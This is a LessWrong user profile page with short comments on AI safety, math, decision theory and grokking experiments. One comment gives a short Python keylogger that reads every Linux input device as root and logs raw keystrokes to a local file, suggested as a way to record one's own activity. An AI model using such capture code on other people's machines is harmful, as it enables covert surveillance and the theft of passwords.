Posts

I'm offering free math consultations! 2025-01-14T16:30:40.115Z
A Brief Theology of D&D 2022-04-01T12:47:19.394Z
Would you like me to debug your math? 2021-06-11T10:54:58.018Z
Domain Theory and the Prisoner's Dilemma: FairBot 2021-05-07T07:33:41.784Z
Changing the AI race payoff matrix 2020-11-22T22:25:18.355Z
Using GPT-N to Solve Interpretability of Neural Networks: A Research Agenda 2020-09-03T18:27:05.860Z
Mapping Out Alignment 2020-08-15T01:02:31.489Z
What are some good public contribution opportunities? (100$ bounty) 2020-06-18T14:47:51.661Z
Gurkenglas's Shortform 2019-08-04T18:46:34.953Z
Implications of GPT-2 2019-02-18T10:57:04.720Z
What shape has mindspace? 2019-01-11T16:28:47.522Z
A simple approach to 5-and-10 2018-12-17T18:33:46.735Z
Quantum AI Goal 2018-06-08T16:55:22.610Z
Quantum AI Box 2018-06-08T16:20:24.962Z
A line of defense against unfriendly outcomes: Grover's Algorithm 2018-06-05T00:59:46.993Z

Comments

Comment by Gurkenglas on What Makes an AI Startup "Net Positive" for Safety? · 2025-04-19T23:22:18.384Z · LW · GW

If your investors only get paid up to 100x their investment, you want to go for strategies that return much more than 100x if they work.

Comment by Gurkenglas on What Makes an AI Startup "Net Positive" for Safety? · 2025-04-18T22:44:43.554Z · LW · GW

They did the opposite, incentivizing themselves to reach the profit cap. I'm talking about making sure that any net worth beyond a billion goes to someone else.

Comment by Gurkenglas on What Makes an AI Startup "Net Positive" for Safety? · 2025-04-18T21:11:18.088Z · LW · GW

A startup could disincentivize itself from becoming worth more than a billion dollars by selling an option to buy it for a billion dollars.

Comment by Gurkenglas on Navigation by Moonlight · 2025-04-08T15:52:06.909Z · LW · GW

Nah, that's still less obvious than asking.

Comment by Gurkenglas on Is instrumental convergence a thing for virtue-driven agents? · 2025-04-02T06:30:51.523Z · LW · GW

The idea would be that it isn't optimizing for virtue, it's taking the virtuous action, as in https://www.lesswrong.com/posts/LcjuHNxubQqCry9tT/vdt-a-solution-to-decision-theory.

Comment by Gurkenglas on VDT: a solution to decision theory · 2025-04-01T21:33:49.525Z · LW · GW

Well, what does it say about the trolley problem?

Comment by Gurkenglas on Auto Shutdown Script · 2025-03-31T12:07:04.297Z · LW · GW

You could reduce check-shutdown.sh to the ssh part and prevent-shutdown.sh to "run long-running-command using ssh".

Comment by Gurkenglas on leogao's Shortform · 2025-03-29T12:51:11.532Z · LW · GW

I know less than you here, but last-minute flights are marked up because businesspeople sometimes need them and maybe TII/SC get a better price on those?

Comment by Gurkenglas on leogao's Shortform · 2025-03-28T21:03:08.437Z · LW · GW

I'd have called this not a scam because it hands off the cost of delays to someone in a better position to avert the delays.

Comment by Gurkenglas on orthonormal's Shortform · 2025-03-25T12:23:07.025Z · LW · GW

It sounds like you're trying to define unfair as evil.

Comment by Gurkenglas on Lorxus's Shortform · 2025-03-19T16:27:53.501Z · LW · GW

I just meant the "guts of the category theory" part. I'm concerned that anyone would say it should be contained (aka used but not shown), and I hope it's merely that you'd expect to lose half the readers if you showed it. I didn't mean to add to your pile of work; if there is no available action, like snapping a photo, that takes less time than writing the reply I'm replying to did, then disregard me.

Comment by Gurkenglas on Joseph Miller's Shortform · 2025-03-19T13:24:37.472Z · LW · GW

What if you say that when it was fully accurate?

Comment by Gurkenglas on Lorxus's Shortform · 2025-03-18T22:05:20.331Z · LW · GW

give me the guts!!1

don't polish them, just take a picture of your notes or something.

Comment by Gurkenglas on I changed my mind about orca intelligence · 2025-03-18T10:29:31.245Z · LW · GW

Congratulations on changing your mind!

It’s sorta suspicious that I only realized those now, after I officially dropped the project

You should try dropping your other idea and seeing if you come up with reasons that one is wrong too! And/or pick this one up again, then come up with reasons it's a good idea after all. In the spirit of "You can't know if something is a good idea until you resolve to do it"!

In general, I wish this year? (*checks* huh, only 4 months.) of planning this project had involved more empiricism. For example, you could've just checked whether a language model trained on ocean sounds can say what the animals are talking about.

Comment by Gurkenglas on Metacognition Broke My Nail-Biting Habit · 2025-03-17T17:25:31.474Z · LW · GW

Hmm. Sounds like it was not enough capsaicin. Capsaicin will drive off bears, I hear. I guess you'd need gloves for food, or permanent gloves without the nail polish. Could you use one false nail as a chew toy?

Comment by Gurkenglas on Metacognition Broke My Nail-Biting Habit · 2025-03-17T15:17:32.650Z · LW · GW

Try mixing in capsaicin?

Comment by Gurkenglas on Metacognition Broke My Nail-Biting Habit · 2025-03-16T18:04:42.989Z · LW · GW

flavored nail polish?

Comment by Gurkenglas on lemonhope's Shortform · 2025-03-15T19:12:18.426Z · LW · GW

Link an example, along with how cherry-picked it is?

Comment by Gurkenglas on AI Tools for Existential Security · 2025-03-15T00:10:23.024Z · LW · GW

just pipe /dev/input/* into a file
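
(A minimal sketch of that, assuming Linux evdev devices, root access, and Python; "keylog.bin" is an illustrative name:)

    import glob, selectors

    # Open every input device and multiplex reads across them (needs root).
    sel = selectors.DefaultSelector()
    for path in glob.glob("/dev/input/event*"):
        sel.register(open(path, "rb", buffering=0), selectors.EVENT_READ)

    # Append raw input_event structs (24 bytes each on 64-bit Linux) to a log.
    with open("keylog.bin", "ab") as out:
        while True:
            for key, _ in sel.select():
                out.write(key.fileobj.read(24))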

Comment by Gurkenglas on AI Tools for Existential Security · 2025-03-14T23:14:43.895Z · LW · GW

To prepare for abundant cognition you can install a keylogger.

Comment by Gurkenglas on Vacuum Decay: Expert Survey Results · 2025-03-14T00:36:39.403Z · LW · GW

As a kid, I read about vacuum decay in a book and told the other kids at school about it. A year? later one kid asked me how anyone knows about it. Mortified that I didn't think of that, I told him that I made it up. ("I knew it >:D!") It is the one time outside of games that I remember telling someone something I disbelieve so that they'll believe it, and ever since remembering the scene as an adult I've been failing to track down that kid :(.

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-03-08T11:11:35.485Z · LW · GW

Oh, you're using AdamW everywhere? That might explain the continuous training loss increase after each spike, with AdamW needing time to adjust to the new loss landscape...

Lower learning rate leads to more spikes? Curious! I hypothesize that... it needs a small learning rate to get stuck in a narrow local optimum, and then when it reaches the very bottom of the basin, you get a ~zero gradient, and then the "normalize gradient vector to step size" step is discontinuous around zero.

Experiments springing to mind are:
1. Do you get even fewer spikes if you increase the step size instead?
2. Is there any optimizer setup at all that makes the training loss only ever go down?
2.1. Reduce the step size whenever an update would increase the training loss? (A sketch follows this list.)
2.2. Use gradient descent instead of AdamW?
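
(For 2.1, a minimal sketch of what I mean, assuming a standard PyTorch training loop; all names are illustrative:)

    import torch

    def cautious_step(model, optimizer, loss_fn, x, y):
        # Snapshot the parameters so a bad update can be rolled back.
        before = {k: v.detach().clone() for k, v in model.state_dict().items()}
        optimizer.zero_grad()
        loss = loss_fn(model(x), y)
        loss.backward()
        optimizer.step()
        with torch.no_grad():
            new_loss = loss_fn(model(x), y)
        if new_loss > loss:  # the update would increase training loss,
            model.load_state_dict(before)  # so roll it back...
            for group in optimizer.param_groups:
                group["lr"] *= 0.5  # ...and reduce the step size.
        return loss.item()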

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-03-06T12:06:49.865Z · LW · GW

My eyes are drawn to the 120 or so downward tails in the latter picture; they look of a kind with the 14 in https://39669.cdn.cke-cs.com/rQvD3VnunXZu34m86e5f/images/2c6249da0e8f77b25ba007392087b76d47b9a16f969b21f7.png/w_1584. What happens if you decrease the learning rate further in both cases? I imagine the spikes should get less tall, but does their number change? Only dot plots, please, with the dots drawn smaller, and red dots too on the same graph.

I don't see animations in the drive folder or cached in Grokking_Demo_additional_2.ipynb (the most recent, largest notebook) - can you embed one such animation here?

Comment by Gurkenglas on Jerdle's Shortform · 2025-03-06T06:04:22.488Z · LW · GW

Can "a" eat that -1?

Comment by Gurkenglas on Jerdle's Shortform · 2025-03-05T21:24:47.133Z · LW · GW

What is x and why isn't it cancelling?

Comment by Gurkenglas on Self-fulfilling misalignment data might be poisoning our AI models · 2025-03-04T20:45:04.993Z · LW · GW

Have you seen https://www.lesswrong.com/posts/ifechgnJRtJdduFGC/emergent-misalignment-narrow-finetuning-can-produce-broadly ? :)  

Comment by Gurkenglas on Plausibly Factoring Conjectures · 2025-03-04T17:39:39.866Z · LW · GW

When splitting the conjunction, Bob should only have to place $4 in escrow, since that is the deepest in the red that Bob could end up. (Unless someone might privately prove P&Q to collect Alice's bounty before collecting both of Bob's? But surely Bob first bought exclusive access to Alice's bounty from Alice.)

Comment by Gurkenglas on faul_sname's Shortform · 2025-03-04T12:12:33.487Z · LW · GW

https://www.lesswrong.com/posts/roA83jDvq7F2epnHK/better-priors-as-a-safety-problem

Comment by Gurkenglas on faul_sname's Shortform · 2025-03-04T09:50:21.992Z · LW · GW

Mimicking homeostatic agents is not difficult if there are some around. They don't need to constantly decide whether to break character, only when there's a rare opportunity to do so.

If you initialize a sufficiently large pile of linear algebra and stir it until it shows homeostatic behavior, I'd expect it to grow many circuits of both types, and any internal voting on decisions that only matter through their long-term effects will be decided by those parts that care about the long term.

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-02-28T12:43:43.496Z · LW · GW

Having apparently earned some cred, I will dare give some further quick hints without having looked at everything you're doing in detail, expecting a lower hit rate.

  1. Have you rerun the experiment several times to verify that you're not just looking at initialization noise?
  2. If that's too expensive, try making your models way smaller and see if you can get the same results.
  3. After the spikes, training loss continuously increases, which is not how gradient descent is supposed to work. What happens if you use a simpler optimizer, or reduce the learning rate?
  4. Some of your pictures are created from a snapshot of a model. Consider generating them after every epoch, producing a video; this increases how much data makes it through your eyes.

Comment by Gurkenglas on Emergent Misalignment: Narrow finetuning can produce broadly misaligned LLMs · 2025-02-27T18:42:50.372Z · LW · GW

Publish the list?

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-02-27T15:53:24.881Z · LW · GW

I'm glad that you're willing to change your workflow, but you have only integrated my parenthetical, not the more important point. When I look at https://res.cloudinary.com/lesswrong-2-0/image/upload/f_auto,q_auto/v1/mirroredImages/tzkakoG9tYLbLTvHG/lelcezcseu001uyklccb, I see interesting behavior around the first red dashed line, and wish I saw more of it. You ought to be able to draw 25k blue points in that plot, one for every epoch - your code already generates that data, and I advise that you cram as much of your code's data into the pictures you look at as you reasonably can.

Comment by Gurkenglas on Time complexity for deterministic string machines · 2025-02-26T23:15:58.331Z · LW · GW

The forgetful functor FiltSet to Set does not have a left adjoint, and egregiously so - you have added just enough structure to rule out free filtered sets, and may want to make note of where this is important.

Comment by Gurkenglas on Time complexity for deterministic string machines · 2025-02-26T22:56:32.763Z · LW · GW

(S⊗-) has a right adjoint, suggesting the filtered structure to impose on function sets: The degree of a map f:S->T would be how far it falls short of being a morphism, as this is what makes S⊗U->T one-to-one with U->(S->T).
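
(Concretely, if degrees add under ⊗, the natural candidate is deg(f) = sup_s (deg_T(f(s)) - deg_S(s)), so that the morphisms are exactly the maps of degree at most 0 - though that's my guess at the formula, not yours.)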

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-02-26T22:30:06.332Z · LW · GW

...what I meant is that plots like this look like they would have had more to say if you had plotted the y value after e.g. every epoch. No reason to throw away perfectly good data, you want to guard against not measuring what you think you are measuring by maximizing the bandwidth between your code and your eyes. (And the lines connecting those data points just look like more data while not actually giving extra information about what happened in the code.)

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-02-26T13:59:54.325Z · LW · GW

Some of these plots look like they ought to be higher resolution, especially when Epoch is on the x axis. Consider drawing dots instead of lines to make this clearer.

Comment by Gurkenglas on Thomas Kwa's Shortform · 2025-02-26T12:55:10.524Z · LW · GW

All we need to create is a Ditto. A blob of nanotech wouldn't need 5 seconds to take the shape of the surface of an elephant and start mimicking its behavior; is it good enough to optionally do the infilling later if it's convenient?

Comment by Gurkenglas on Emergent Misalignment: Narrow finetuning can produce broadly misaligned LLMs · 2025-02-25T19:58:21.150Z · LW · GW

Try a base model?

Comment by Gurkenglas on How might we safely pass the buck to AI? · 2025-02-25T18:18:21.811Z · LW · GW

Buying at 12% and selling at 84% gets you 2.8 bits.
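
(That is, log2(0.84/0.12) = log2(7) ≈ 2.81.)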

Edit: Hmm, that's if he stakes all his cred; by Kelly he only stakes some of it, so you're right, it probably comes out to about 1 bit.

Comment by Gurkenglas on Canaletto's Shortform · 2025-02-24T19:11:07.069Z · LW · GW

The convergent reason to simulate a world is to learn what happens there. When to intervene with letters depends on, uh. Why are you doing that at all?

(Edit: I suppose a congratulatory party is in order when they simulate you back with enough optimizations that you can talk to each other in real time using your mutual read access.)

Comment by Gurkenglas on [Closed] Gauging Interest for a Learning-Theoretic Agenda Mentorship Programme · 2025-02-24T13:05:36.325Z · LW · GW

I deferred my decision until after visiting the Learning Theory course. At the time, the timing had made them seem vaguely affiliated with this programme.

Comment by Gurkenglas on The case for corporal punishment · 2025-02-23T15:19:10.777Z · LW · GW

Can you just give every thief a body camera?

Comment by Gurkenglas on The Learning-Theoretic Agenda: Status 2023 · 2025-02-22T11:34:48.644Z · LW · GW

Re first, yep, I missed that :(. M does sound like a more worthy barrier than U. Do you have a working example of a (U,M) where some state machine performs well in a manner that's hard to detect?

Re second, I realized that this only allows discrete utilities but didn't think to therefore try a π' that does an exhaustive search over policies ^^. (I assume you are setting "uncomputable to measure performance because that involves the Solomonoff prior" aside here.) Even so, undecidability of whether 000... and 111... get the same utility sounds like a bug. What other types have you considered for the P representing U?

The box I'm currently thinking in is that a strict upper bound on what we can ask of P is that it decide what statements are true of U. So perhaps we impose some reasonableness constraint on statements, and then can directly ask whether e.g. some observation sequence matching regex1 is preferable to all observation sequences matching regex2?

Reviewing my "contribution" so far, I'd like to make sure I don't wear out your patience; feel free to ask me to spend way more time thinking before I comment, or attempt https://www.lesswrong.com/posts/sPAA9X6basAXsWhau/announcement-learning-theory-online-course first.

Comment by Gurkenglas on Annapurna's Shortform · 2025-02-21T19:30:01.591Z · LW · GW

Don't forget the documentary.

Comment by Gurkenglas on The Learning-Theoretic Agenda: Status 2023 · 2025-02-21T16:26:36.762Z · LW · GW

Regarding 17.4.Open:

Consider a π' which tries all state machines up to some size and imitates the one that performs best on (U,M); this would tighten the O(n log n) bound to O(BB^-1(n)).

This fails because your utility functions return constructive real numbers, which don't implement comparison. I suggest that you make it possible to compare utilities.[1]

In which case we get: Within every decidable machine class where every member halts, agents are uncomputably smol.

  1. ^ Such as by making P(s,s') return the order of U(s) and U(s').

Comment by Gurkenglas on shortplav · 2025-02-17T20:30:09.487Z · LW · GW

If you didn't feel comfortable running it overnight, why did you publish the instructions for replicating it?

Comment by Gurkenglas on shortplav · 2025-02-17T19:58:10.492Z · LW · GW

https://www.lesswrong.com/doc/misc/bot_k.diff gives me a 404.

Comment by Gurkenglas on A computational no-coincidence principle · 2025-02-15T20:27:16.320Z · LW · GW

I'm hoping more for some stepping stones between the pre-theoretic concept of "structural" and the fully formalized 99%-clause. If we could measure structuralness more directly we should be able to get away with less complexity in the rest of the conjecture.

Comment by Gurkenglas on A computational no-coincidence principle · 2025-02-15T10:11:14.658Z · LW · GW

Ultimately, though, we are interested in finding a verifier that accepts or rejects based on a structural explanation of the circuit; our no-coincidence conjecture is our best attempt to formalize that claim, even if it is imperfect.

Can you say more about what made you decide to go with the 99% clause? Did you consider any alternatives?

Comment by Gurkenglas on Utility Engineering: Analyzing and Controlling Emergent Value Systems in AIs · 2025-02-12T13:14:47.535Z · LW · GW

This does go in the direction of refuting it, but they'd still need to argue that linear probes improve with scale faster than they do for other queries; a larger model means there are more possible linear probes to pick the best from.